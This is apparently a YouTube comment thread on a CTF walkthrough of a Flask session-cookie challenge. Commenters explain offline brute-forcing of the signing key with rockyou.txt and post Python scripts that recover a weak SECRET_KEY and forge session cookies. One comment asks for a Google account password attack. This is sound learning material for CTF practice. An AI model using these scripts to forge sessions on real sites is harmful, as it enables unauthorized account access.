Just a small comment: you could just offline brute force the secret key using the original session cookie you get from the site and compare it to what you generate. This way you don't need to brute force the remote server, and it will make brute forcing faster (because it's not over the network).
Aside from that, great video as always, thanks a lot for what you are doing for the community, you are awesome!
Was thinking this the whole time
Ah crap, you're totally right. That would have been a much better approach and not end up hammering the website ("no bruteforce"). Good call -- I'll know to do that for next time, thanks so much! And thanks for watching!
Hi, I am wondering: the reason we can brute-force this secret_key is because the signature is invalid, right?
@@trieulieuf9 no, that's not why you can brute force it. You can brute force it because the site is designed in a way that lets you, like most CTFs.
I’m learning so much from this channel. Thanks so much.
You make me wanna go learn Python so hard right now after seeing the power of this programming language.
Thanks John!
Wonderful video thanks, this walkthrough helped me to solve picoctf "more cookies" challenge which is based on flask cookie...
Also, we can observe the header value server: meinheld/1.0.1, so we can deduce that certainly a sandboxed Python backend must be at work at the backend; this could be a Python sandbox vulnerability or SSTI.
This is awesome. I like the way you get going with things and find out the right path. I like your Python skills man. I do love Python but I am merely a beginner. Keep doing such videos. Thank you very much 😊
I just discovered you some days ago and I love your content. It's not the area I work, but who knows in future? Anyway, knowledge is knowledge, right? Keep up the good work.
I really loved your videos.. it's worth watching.. kudos to your programming skills.. keep doing more.. keep entertaining and encouraging us.. Love from INDIA
I thought for sure this was going to be a situation where they don't verify the signature, so you could just set the flagship key to true in Burp and be on your way. But it was great seeing your python script!
Very new to pretty much all of this ... it seems to slowly make sense, very fun to watch and informative 👍
Learned a lot. Appreciate you
You could have verified the signature offline, only the correct secret will generate a valid signature.
Ah crap, you're right. That's a better way to do that, so it's not bruteforcing the main website. Good call -- I'll know to do that for next time, thanks so much! And thanks for watching!
Any possibility of going over how to complete this without brute force? I'd be very interested in seeing that :)
Also, yeah, a lot of people have mentioned it already, but offline hash verification probably would've been cleaner. Overall, great vid. Love your content
Awesome man ... thank you
Thanks so much for watching!
Awesome
The Cookies must flow...
❤️
Great content as always John
Nice demo. Great!
Thanks so much for watching!
I thought you said there was no brute forcing? Did I mishear?
Yeeeeahhh I suck, I see from reading all the comments here, it's a better move to try and verify the signature offline. I definitely know to do that for next time. Thanks for watching!
Don't get me wrong I enjoyed watching your process. I just heard one thing and saw another haha. Cheers for all the good videos!
@@GeekBatman He had asked about brute forcing on the server side. The response was that he didn't need to. He ignored that and pushed on the server. But, again, he didn't *need* to, because the answer was already on his desktop. So, he did need to use brute force, but not against the server. The answer he got was correct. The question he asked could have been reworded. Understand now?
Great video Mr Hammond 👍 thanks
Thanks so much for watching!
That Is Amazing
Great vid!
Nice. I wasn't able to do it. Now I know how to do it :)
I did those PicoCTF Flask ones. You don't actually need to send it to the server over and over again. Because you have a cookie, you can just take the data out of the cookie, then sign it with all of the rockyou passwords, and check to see if the token you get from signing it is equal to the token the website gave you. Once you have the secret key that way, then you can forge a different one and send only one request back to the server.
It's still brute-forcing, but you don't need to hammer the server. Also it's like a million times faster to do it locally. If the password had been the 10 millionth one in rockyou.txt, hammering the server would take too long.
Am I explaining that clearly?
something nice
Ha! Thank you for watching!
How in the hell did you learn all this stuff? Just WOW. Very impressive. I feel dumb, just watching. lol
Learn programming. Code a web app. Then you know how it all works together and what the possible attack vectors could be.
Is it possible to solve those challenges today? Or has the competition ended and they are no longer available?
It looks like the challenges are still available here: ctf2020.hackpack.club/challenges
Thanks for watching!
Any websites like THM, HTB and HackPack CTF? thx.
You can bruteforce it locally by doing this:
    from itsdangerous import Signer
    import hashlib

    # Load rockyou.txt as raw bytes (one candidate per line; the file is not all valid UTF-8)
    with open("rockyou.txt", "rb") as f:
        rockyou = [line.rstrip(b"\r\n") for line in f]

    wanted_signature = b'EmEAYEBaTe9gNwYCeG86ffR98oM'  # The last part of the cookie (SIGNATURE)
    encoded_plus_timestamp = "eyJmbGFnc2hpcCI6ZmFsc2UsInVzZXJuYW1lIjoicGx6c3ViIn0.XqM9Yw"  # First part of the cookie (ENCODED_STRUCTURE.ENCODED_TIMESTAMP)

    for password in rockyou:
        # Flask's session signer parameters; found them through some source digging :)
        s = Signer(password, salt="cookie-session", key_derivation="hmac", digest_method=hashlib.sha1)
        if s.get_signature(encoded_plus_timestamp) == wanted_signature:
            print(f"Secret key is: {password.decode(errors='replace')}!")
            break
This is much faster and there is no need to hammer the server :)
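An added example, not the commenter's or the video's code, that does the same offline check with only the Python standard library (re-implementing the HMAC-SHA1 key derivation itsdangerous uses for Flask sessions) so it also shows what the cookie carries, that the signature is valid, and that a random SECRET_KEY is not recoverable from a wordlist. The wordlist and the secrets in it are constructed; the payload and timestamp values match the cookie quoted in the comment above.

```python
import base64, hashlib, hmac, json, secrets
from typing import Iterable, Optional

SALT = b"cookie-session"  # fixed salt Flask passes to itsdangerous for session cookies

def b64(raw: bytes) -> str:
    """URL-safe base64 without '=' padding, as itsdangerous emits it."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def b64d(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def flask_signature(secret: str, value: str) -> str:
    # itsdangerous key_derivation="hmac": key = HMAC-SHA1(secret, salt); sig = HMAC-SHA1(key, value)
    key = hmac.new(secret.encode(), SALT, hashlib.sha1).digest()
    return b64(hmac.new(key, value.encode(), hashlib.sha1).digest())

def make_session_cookie(secret: str, session: dict, ts: int) -> str:
    """payload.timestamp.signature with an uncompressed payload (Flask prefixes '.' when it zlib-compresses)."""
    payload = b64(json.dumps(session, separators=(",", ":"), sort_keys=True).encode())
    value = f"{payload}.{b64(ts.to_bytes((ts.bit_length() + 7) // 8, 'big'))}"
    return f"{value}.{flask_signature(secret, value)}"

def decode_session(cookie: str) -> dict:
    """The claims are only base64 JSON: anyone can read them without the key."""
    return json.loads(b64d(cookie.split(".")[0]))

def session_timestamp(cookie: str) -> int:
    return int.from_bytes(b64d(cookie.split(".")[1]), "big")

def recover_secret(cookie: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline check: which candidate reproduces the cookie's own (valid) signature? None if nothing does."""
    value, sig = cookie.rsplit(".", 1)
    for cand in candidates:
        if hmac.compare_digest(flask_signature(cand, value), sig):
            return cand
    return None

if __name__ == "__main__":
    WORDLIST = ["123456", "password", "letmein", "qwerty"]  # constructed stand-in for rockyou.txt
    claims = {"flagship": False, "username": "plzsub"}
    weak = make_session_cookie("letmein", claims, 1587756387)       # guessable key: recovered
    print("weak key recovered:", recover_secret(weak, WORDLIST))
    strong = make_session_cookie(secrets.token_hex(32), claims, 1587756387)  # random key: not recovered
    print("random key recovered:", recover_secret(strong, WORDLIST))
```

The takeaway for the question above about why brute forcing works: the signature checks out for exactly one key, so the weakness is a guessable SECRET_KEY, not a broken signature check.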
can you make a setup video pls ?
Setup of what? My hardware, recording equipment? Or like, software and operating system and tools?
@@_JohnHammond your hardware and the software you use, does that make sense?
@@_JohnHammond and do you use a laptop?
@@shadowKamiyama Yeah, I just use my DELL XPS 15 laptop. When I am at my desk I connect to an external monitor, and I use Ubuntu as my daily driver operating system.
Great vid, but for the love of God please choose either single or double quotes
Ha, I should get the Python "Black" linter back to being integrated into Sublime Text so it switches all that nonsense and corrects me automatically ahaha.
I hate these kinds of challenges... because it always boils down to "do you have the correct list". You are not learning anything or any "new technique" :-/
All I heard throughout the video is just cookie🍪 cookie🍪 cookie🍪 and some forging sh*t, that's it, cause I am a noob, not your problem @johnHammonh though 😘
Alright, this was my last resort... I need someone's opinion or help. I am like 50% positive that there is a message that I need to decode in an image that I have. I'm only 50% positive because I'm a newb, and I think that it might be using zero width/white space... But this bitch is Latin characters and I am not advanced enough to even know if I am on the right track.. I've been going at it for almost 2 weeks. I can't find anyone on reddit who is willing to take a look.. I just need someone to tell me if there is or is not something weird with this image's code. Hopefully someone sees this.. or I'm SOL. Thank you. Much love.
So many Code thieves..huh!!! 🤓🤡
Lol if the key was the flag it would be cool
If the key was the flag it wouldn't be in any wordlist, so good luck bruteforcing it XD
@@_sp3149 lol yeah, that's what I was saying
Bro can you upload Google account password attack or hack please